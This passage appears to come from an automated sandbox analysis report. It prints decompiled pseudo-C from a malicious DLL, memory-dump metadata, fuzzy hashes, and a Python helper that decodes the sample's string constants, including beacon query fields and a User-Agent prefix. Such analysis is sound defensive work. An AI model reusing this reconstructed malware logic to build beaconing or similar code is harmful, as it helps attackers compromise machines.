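        shown = repr(text) if text is not None else "(binary)"
        print(f"0x{value:08x} -> {shown}")
    # The first id dword as the formatter receives it after `bswap eax`:
    print(f"bswap32(0xf56cfa1f) = 0x{bswap32(0xf56cfa1f):08x}")
```

                                                  Run over the five sample lines this yields soft, &upt, &dns, &who and one binary dword, which is the order in which the function above builds its query string. The same helper works on any other function in this report, including the "Mozi" and "S:(M" constants in E046B225B further down, and bswap32 gives the byte order a %08x-style field would print for each id dword.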

                                                  Instruction address column for the function above: 0x046b8b94 .. 0x046b8e79


                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8248005f97500eb6e79447e69e5ba9b34dc02af34978f36dbaa7e3207d10c3bd
                                                  • Instruction ID: b5ea17e68d73420855462f3f9ead44f1f79f1645d99364275ff5b5e798ce5a54
                                                  • Opcode Fuzzy Hash: 8248005f97500eb6e79447e69e5ba9b34dc02af34978f36dbaa7e3207d10c3bd
                                                  • Instruction Fuzzy Hash: 6B913971900208AFDB11EFA8DC84A9E7BB9EF48354F144059F944EB260E739ED91DBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bbdeda9d8844165047f5c588f7eaa565b412d1a036f31291e21dd2b71c4be79
                                                  • Instruction ID: 5fb07f447d9f0d10b083faf5136733fb575f49a171af623fd47f2b1c35115115
                                                  • Opcode Fuzzy Hash: 0bbdeda9d8844165047f5c588f7eaa565b412d1a036f31291e21dd2b71c4be79
                                                  • Instruction Fuzzy Hash: 90816CB2D00209EFDF21CFA5DC44AEEBBB9FB45340F00416AE545E6250E735AE84CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 29%
                                                  			E046B225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				signed int _t22;
                                                  				signed int _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				signed int _t32;
                                                  				signed int _t41;
                                                  				signed int _t42;
                                                  				signed int _t43;
                                                  				signed int _t45;
                                                  				intOrPtr _t47;
                                                  				intOrPtr* _t49;
                                                  				signed int _t51;
                                                  				signed char _t53;
                                                  				intOrPtr _t55;
                                                  				signed int _t56;
                                                  				intOrPtr _t59;
                                                  				signed int _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t65;
                                                  
                                                  				_t58 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E046B550E();
                                                  				if(_t21 != 0) {
                                                  					_t56 =  *0x46bd25c; // 0x4000000a
                                                  					_t52 = (_t56 & 0xf0000000) + _t21;
                                                  					 *0x46bd25c = (_t56 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0x46bd164(0, 2); // executed
                                                  				_v16 = _t22;
                                                  				// 0, 1 and 0x80010106 are S_OK, S_FALSE and RPC_E_CHANGED_MODE: the three results after which COM is usable,
                                                  				// i.e. the usual check around CoInitializeEx(NULL, COINIT_APARTMENTTHREADED = 2); the import at 0x46bd164 is not named here
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E046B3D0D( &_v8,  &_v20); // executed
                                                  					_t51 = _t25;
                                                  					_t26 =  *0x46bd27c; // 0x96a5a8
                                                  					if( *0x46bd25c > 5) { // version word built above (0x4000000a on this Windows 10 run) selects one of two SDDL strings
                                                  						_t8 = _t26 + 0x46be5cd; // 0x4d283a53 = "S:(M": an SDDL string with a SACL; the only ACE type starting with M is ML (mandatory label)
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0x46bea15; // 0x44283a44 = "D:(D": an SDDL string with a DACL whose first ACE is a deny entry
                                                  						_t27 = _t7;
                                                  					}
                                                  					E046B1BF4(_t27, _t27);
                                                  					_t31 = E046B1B2F(_t58,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						__imp__(_v20);
                                                  					}
                                                  					_t59 = 5;
                                                  					if(_t51 != _t59) {
                                                  						 *0x46bd270 =  *0x46bd270 ^ 0x81bbe65d;
                                                  						_t32 = E046B2049(_t31, 0x60);
                                                  						__eflags = _t32;
                                                  						 *0x46bd32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8); // push 8 / pop eax: result = 8 (ERROR_NOT_ENOUGH_MEMORY) when the 0x60-byte allocation fails
                                                  							_pop(0);
                                                  						} else {
                                                  							L046BA7BC();
                                                  							_t47 =  *0x46bd32c; // 0x50295b0
                                                  							_t65 = _t65 + 0xc;
                                                  							__imp__(_t47 + 0x40, _t32, 0, 0x60); // sets up the field at +0x40 that the first function locks and unlocks (InitializeCriticalSection-like; trailing args are decompiler leftovers)
                                                  							_t49 =  *0x46bd32c; // 0x50295b0
                                                  							 *_t49 = 0x46be836; // first field of the structure points into the module itself
                                                  						}
                                                  						__eflags = 0;
                                                  						_t51 = 0;
                                                  						if(0 == 0) {
                                                  							__imp__( *0x46bd238, 0, 0x43);
                                                  							__eflags = 0;
                                                  							 *0x46bd2c4 = 0;
                                                  							if(0 == 0) {
                                                  								_push(8); // push 8 / pop eax: error 8 (ERROR_NOT_ENOUGH_MEMORY) for the failed 0x43-byte allocation; the surrounding `if(0 == 0)` tests are a decompiler artifact (quality 29%)
                                                  								_pop(0);
                                                  							} else {
                                                  								_t53 =  *0x46bd25c; // 0x4000000a
                                                  								_t58 = _t53 & 0x000000ff; // low byte of the version word
                                                  								_t55 =  *0x46bd27c; // 0x96a5a8
                                                  								_t13 = _t55 + 0x46be55a; // 0x697a6f4d = "Mozi": start of a "Mozilla/..." User-Agent format string
                                                  								_t52 = _t13;
                                                  								 *0x46bd120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x46bc2a7); // the same formatter import used in the first function, fed the version byte twice
                                                  							}
                                                  							__eflags = 0;
                                                  							_t51 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E046B269C( ~_v8 &  *0x46bd270, 0x46bd00c); // executed
                                                  								_t41 = E046B4094(_t52); // executed
                                                  								_t51 = _t41;
                                                  								__eflags = _t51;
                                                  								if(_t51 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t42 = E046B96A4(_t52); // executed
                                                  								__eflags = _t42;
                                                  								if(_t42 != 0) {
                                                  									__eflags = _v8;
                                                  									_t62 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t43 = E046B6786(_t58, _t62, _v8); // executed
                                                  										_t51 = _t43;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t62;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t45 = E046B3DD9(__eflags, _t62 + 4); // executed
                                                  									_t51 = _t45;
                                                  									__eflags = _t51;
                                                  									if(_t51 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t51 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t63 = _v12;
                                                  						if(_t63 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0x46bd160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t64 = _t63 + 4;
                                                  						do {
                                                  						} while (E046BA501(_t59, _t64, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t51 = _t22;
                                                  					L34:
                                                  					return _t51;
                                                  				}
                                                  			}
                                                  0x046b225b
                                                  0x046b2266
                                                  0x046b2269
                                                  0x046b226c
                                                  0x046b226f
                                                  0x046b2276
                                                  0x046b2278
                                                  0x046b2284
                                                  0x046b2286
                                                  0x046b2286
                                                  0x046b228f
                                                  0x046b2297
                                                  0x046b229a
                                                  0x046b22b4
                                                  0x046b22c0
                                                  0x046b22c2
                                                  0x046b22c7
                                                  0x046b22d1
                                                  0x046b22d1
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22c9
                                                  0x046b22d8
                                                  0x046b22e5
                                                  0x046b22ec
                                                  0x046b22f1
                                                  0x046b22f1
                                                  0x046b22f9
                                                  0x046b22fc
                                                  0x046b2322
                                                  0x046b232e
                                                  0x046b2333
                                                  0x046b2335
                                                  0x046b233a
                                                  0x046b2366
                                                  0x046b2368
                                                  0x046b233c
                                                  0x046b2340
                                                  0x046b2345
                                                  0x046b234a
                                                  0x046b2351
                                                  0x046b2357
                                                  0x046b235c
                                                  0x046b2362
                                                  0x046b2369
                                                  0x046b236b
                                                  0x046b236d
                                                  0x046b237c
                                                  0x046b2382
                                                  0x046b2384
                                                  0x046b2389
                                                  0x046b23b9
                                                  0x046b23bb
                                                  0x046b238b
                                                  0x046b238b
                                                  0x046b2391
                                                  0x046b239e
                                                  0x046b23a4
                                                  0x046b23a4
                                                  0x046b23ac
                                                  0x046b23b5
                                                  0x046b23bc
                                                  0x046b23be
                                                  0x046b23c0
                                                  0x046b23c7
                                                  0x046b23d4
                                                  0x046b23d9
                                                  0x046b23de
                                                  0x046b23e0
                                                  0x046b23e2
                                                  0x00000000
                                                  0x00000000
                                                  0x046b23e4
                                                  0x046b23e9
                                                  0x046b23eb
                                                  0x046b23f2
                                                  0x046b23f6
                                                  0x046b23f9
                                                  0x046b240e
                                                  0x046b2412
                                                  0x046b2417
                                                  0x00000000
                                                  0x046b2417
                                                  0x046b23fb
                                                  0x046b23fd
                                                  0x00000000
                                                  0x00000000
                                                  0x046b2403
                                                  0x046b2408
                                                  0x046b240a
                                                  0x046b240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b240c
                                                  0x046b23ef
                                                  0x046b23ef
                                                  0x046b23c0
                                                  0x046b22fe
                                                  0x046b22fe
                                                  0x046b2303
                                                  0x046b2419
                                                  0x046b241d
                                                  0x046b2425
                                                  0x046b2425
                                                  0x00000000
                                                  0x046b241d
                                                  0x046b2309
                                                  0x046b230c
                                                  0x046b2316
                                                  0x046b231d
                                                  0x00000000
                                                  0x046b242d
                                                  0x046b242d
                                                  0x046b2431
                                                  0x046b2435
                                                  0x046b2435

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d193c251ea12aff5df2090029ecc609de4a9af672547a5c75565451ea1b1773
                                                  • Instruction ID: aceef5da48bfe6d7e0fad2a833d522f9210e263385707cce1fb2cd855da323db
                                                  • Opcode Fuzzy Hash: 7d193c251ea12aff5df2090029ecc609de4a9af672547a5c75565451ea1b1773
                                                  • Instruction Fuzzy Hash: 3851C871A10315ABEB219FA4D868BDE37E8EB04704F0444AAE681DB340F678EDC48BD5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E046B3DD9(void* __eflags, char _a4) {
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				char* _v20;
                                                  				intOrPtr _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				char _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t39;
                                                  				intOrPtr _t41;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t48;
                                                  				void* _t51;
                                                  				intOrPtr _t60;
                                                  				void* _t70;
                                                  				intOrPtr _t75;
                                                  
                                                  				_push(0x2c);
                                                  				_push(0);
                                                  				_push( &_v84);
                                                  				_v88 = 0;
                                                  				L046BA7BC();
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t39 =  *0x46bd27c; // 0x96a5a8
                                                  				_t5 = _t39 + 0x46bee40; // 0x410025
                                                  				_t41 = E046B6A12(_t5);
                                                  				_t75 = _t41;
                                                  				_v16 = _t75;
                                                  				if(_t75 == 0) {
                                                  					_t70 = 8;
                                                  					L24:
                                                  					return _t70;
                                                  				}
                                                  				__imp__(_t75);
                                                  				_t43 =  *0x46bd114(_t75, _a4, _t41); // executed
                                                  				if(_t43 != 0) {
                                                  					_t70 = 1;
                                                  					L22:
                                                  					E046B9039(_t43, _v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E046BA72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t43 = E046B809F(0,  *0x46bd33c);
                                                  				_v12 = _t43;
                                                  				if(_t43 == 0) {
                                                  					_t70 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t48 =  *0x46bd27c; // 0x96a5a8
                                                  					_t11 = _t48 + 0x46be81a; // 0x65696c43
                                                  					_t51 = E046B809F(0, _t11);
                                                  					_t77 = _t51;
                                                  					if(_t51 == 0) {
                                                  						_t70 = 8;
                                                  					} else {
                                                  						_t70 = E046B6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
                                                  						_t51 = E046B9039(_t68, _t77);
                                                  					}
                                                  					if(_t70 != 0) {
                                                  						L17:
                                                  						_t43 = E046B9039(_t51, _v12);
                                                  						L19:
                                                  						_t76 = _a4;
                                                  						if(_a4 != 0) {
                                                  							_t43 = E046B1F99(_t76);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0x46bd260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E046B8F83(_t70, _v88, _v84,  *0x46bd270, 0);
                                                  							_t70 = E046B1C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t70 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t70 = E046B42EA( &_v40, 0);
                                                  							}
                                                  							_t51 = E046B9039(_t56, _v88);
                                                  							goto L17;
                                                  						}
                                                  						_t60 =  *0x46bd27c; // 0x96a5a8
                                                  						_t18 = _t60 + 0x46be823; // 0x65696c43
                                                  						_t51 = E046B809F(0, _t18);
                                                  						_t79 = _t51;
                                                  						if(_t51 == 0) {
                                                  							_t70 = 8;
                                                  						} else {
                                                  							_t70 = E046B6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
                                                  							_t51 = E046B9039(_t65, _t79);
                                                  						}
                                                  						if(_t70 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}
                                                  0x046b3de4
                                                  0x046b3de9
                                                  0x046b3dea
                                                  0x046b3deb
                                                  0x046b3dee
                                                  0x046b3df5
                                                  0x046b3dfb
                                                  0x046b3dfc
                                                  0x046b3dfd
                                                  0x046b3dfe
                                                  0x046b3dff
                                                  0x046b3e00
                                                  0x046b3e08
                                                  0x046b3e0f
                                                  0x046b3e14
                                                  0x046b3e18
                                                  0x046b3e1b
                                                  0x046b3f6b
                                                  0x046b3f6e
                                                  0x046b3f72
                                                  0x046b3f72
                                                  0x046b3e22
                                                  0x046b3e2d
                                                  0x046b3e35
                                                  0x046b3f5e
                                                  0x046b3f5f
                                                  0x046b3f62
                                                  0x00000000
                                                  0x046b3f62
                                                  0x046b3e47
                                                  0x046b3e49
                                                  0x046b3e49
                                                  0x046b3e54
                                                  0x046b3e5b
                                                  0x046b3e5e
                                                  0x046b3f4d
                                                  0x00000000
                                                  0x046b3e64
                                                  0x046b3e64
                                                  0x046b3e69
                                                  0x046b3e72
                                                  0x046b3e77
                                                  0x046b3e80
                                                  0x046b3ea3
                                                  0x046b3e82
                                                  0x046b3e98
                                                  0x046b3e9a
                                                  0x046b3e9a
                                                  0x046b3ea6
                                                  0x046b3f41
                                                  0x046b3f44
                                                  0x046b3f4e
                                                  0x046b3f4e
                                                  0x046b3f53
                                                  0x046b3f55
                                                  0x046b3f55
                                                  0x00000000
                                                  0x046b3eac
                                                  0x046b3eb3
                                                  0x046b3ef4
                                                  0x046b3f05
                                                  0x046b3f1b
                                                  0x046b3f1f
                                                  0x046b3f24
                                                  0x046b3f2a
                                                  0x046b3f37
                                                  0x046b3f37
                                                  0x046b3f3c
                                                  0x00000000
                                                  0x046b3f3c
                                                  0x046b3eb5
                                                  0x046b3eba
                                                  0x046b3ec3
                                                  0x046b3ec8
                                                  0x046b3ecc
                                                  0x046b3eef
                                                  0x046b3ece
                                                  0x046b3ee4
                                                  0x046b3ee6
                                                  0x046b3ee6
                                                  0x046b3ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x046b3ef2
                                                  0x046b3ea6

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 23b011ae4db412037c07dc342a6cc88521b26e85b0ddd29c107451d0063d101f
                                                  • Instruction ID: 61cfdfceac9b1e8a8b732b26876311d04481ac54ac79c776d18aec719dd70aa2
                                                  • Opcode Fuzzy Hash: 23b011ae4db412037c07dc342a6cc88521b26e85b0ddd29c107451d0063d101f
                                                  • Instruction Fuzzy Hash: 52413371A01218AAEB11AFF4DC84DDE7BBDEF08744B00412AEA45EB211F675EDC587D4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                  • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                  • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5029edcf33e8bb36352b5a65ebc0e601b8e2aa2e1d37099cf14eac4a98003686
                                                  • Instruction ID: 0ed07dd42d000b9b56e647c0b9343541c9638c07f822c028bd15244169d53c92
                                                  • Opcode Fuzzy Hash: 5029edcf33e8bb36352b5a65ebc0e601b8e2aa2e1d37099cf14eac4a98003686
                                                  • Instruction Fuzzy Hash: 8D512E76910209BFDB10DFA4C8948EEB7B6FF89340B148879E945EB210E775AD85CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 21%
                                                  			E046B6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				intOrPtr _v40;
                                                  				char _v44;
                                                  				char _v88;
                                                  				char _v92;
                                                  				char* _t44;
                                                  				intOrPtr _t48;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t51;
                                                  				char _t55;
                                                  				intOrPtr _t59;
                                                  				signed int _t60;
                                                  				void* _t63;
                                                  				intOrPtr* _t64;
                                                  				void* _t65;
                                                  				signed int _t66;
                                                  				intOrPtr _t71;
                                                  				intOrPtr* _t72;
                                                  				intOrPtr* _t73;
                                                  				void* _t75;
                                                  
                                                  				_t44 =  &_v88;
                                                  				_v92 = 0;
                                                  				L046BA7BC();
                                                  				__imp__(0, 1, 0, _t44, 0, 0x2c);
                                                  				_v44 = _t44;
                                                  				if(_t44 == 0) {
                                                  					__imp__();
                                                  					_v8 = _t44;
                                                  				} else {
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L046BB0C8();
                                                  					_t72 = __imp__; // 0x7519f710
                                                  					_v36 = _t44;
                                                  					_v32 = __edx;
                                                  					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x46bd240, 0, 0xff676980, 0xffffffff);
                                                  					_t48 =  *0x46bd26c; // 0x2c8
                                                  					_t64 = __imp__; // 0x7519f730
                                                  					_v40 = _t48;
                                                  					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                  					_v8 = _t50;
                                                  					if(_t50 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0x46bd24c = 5;
                                                  						} else {
                                                  							_t63 = E046B73FD(__edx); // executed
                                                  							if(_t63 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0x46bd260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t66 = _v12;
                                                  						_t53 = _t66 << 4;
                                                  						_t71 = _t75 + (_t66 << 4) - 0x54;
                                                  						_t67 = _t66 + 1;
                                                  						_v24 = _t66 + 1;
                                                  						_t55 = E046B8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
                                                  						_v8 = _t55;
                                                  						if(_t55 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t60 = _v24;
                                                  						_t85 = _t60 - 3;
                                                  						_v12 = _t60;
                                                  						if(_t60 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8 = E046B3BF1(_t67, _t85,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t55 - 0x10d2;
                                                  						if(_t55 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0x46bd244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0x46bd248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t55 = E046BA1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0x46bd248);
                                                  								L21:
                                                  								L046BB0C8();
                                                  								_v36 = _t55;
                                                  								_v32 = _t71;
                                                  								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                  								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t59;
                                                  								_v8 = _t59;
                                                  								if(_t59 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t73 =  &_v92;
                                                  					_t65 = 3;
                                                  					do {
                                                  						_t51 =  *_t73;
                                                  						if(_t51 != 0) {
                                                  							__imp__( *0x46bd238, 0, _t51);
                                                  						}
                                                  						_t73 = _t73 + 0x10;
                                                  						_t65 = _t65 - 1;
                                                  					} while (_t65 != 0);
                                                  					__imp__(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
                                                   			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                   • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_31_2_46b0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29f4324973c04f7b4ea9946a473dd46e0f3f11af76a1ed9e8870845793a7c6d1
                                                  • Instruction ID: 13b092ec71b9763902923fb91aebd6c13ea1a705ff6197c1594565c1f28607f7
                                                  • Opcode Fuzzy Hash: 29f4324973c04f7b4ea9946a473dd46e0f3f11af76a1ed9e8870845793a7c6d1
                                                  • Instruction Fuzzy Hash: A5513E71801229ABDF10DFD4DC44DEEBFB8EF49324F10411AF990A6290E775AA84CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E046B9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                  				void* _v8;
                                                  				void* __esi;
                                                  				intOrPtr* _t35;
                                                  				void* _t40;
                                                  				intOrPtr* _t41;
                                                  				intOrPtr* _t43;
                                                  				intOrPtr* _t45;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t52;
                                                  				void* _t54;
                                                  				intOrPtr* _t55;
                                                  				intOrPtr* _t57;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr _t68;
                                                  				void* _t72;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  
                                                  				_t55 = _a4;
                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                  				_a4 = 0;
                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                  				if(_t76 < 0) {
                                                  					L18:
                                                  					return _t76;
                                                  				}
                                                  				_t40 = E046B3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                  				_t76 = _t40;
                                                  				if(_t76 >= 0) {
                                                  					_t61 = _a28;
                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                  						_t52 = _v8;
                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                  					}
                                                  					if(_t76 >= 0) {
                                                  						_t43 =  *_t55;
                                                  						_t68 =  *0x46bd27c; // 0x96a5a8
                                                  						_t20 = _t68 + 0x46be1fc; // 0x740053
                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                  						if(_t76 >= 0) {
                                                  							_t76 = E046B7C14(_a4);
                                                  							if(_t76 >= 0) {
                                                  								_t65 = _a28;
                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                  									_t50 = _a4;
                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t45 = _a4;
                                                  						if(_t45 != 0) {
                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                  						}
                                                  						_t57 = __imp__#6; // 0x7504d5b0
                                                  						if(_a20 != 0) {
                                                  							 *_t57(_a20);
                                                  						}
                                                  						if(_a12 != 0) {
                                                  							 *_t57(_a12);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t41 = _v8;
                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                  				goto L18;
                                                   			}

                                                  Memory Dump Source
                                                  • Source File: 0000001F.00000002.651420090.00000000046B1000.00000020.00020000.sdmp, Offset: 046B0000, based on PE: true
                                                   • Associated: 0000001F.00000002.651404257.00000000046B0000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651456086.00000000046BC000.00000002.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651474322.00000000046BD000.00000004.00020000.sdmp
                                                   • Associated: 0000001F.00000002.651490276.00000000046BF000.00000002.00020000.sdmp
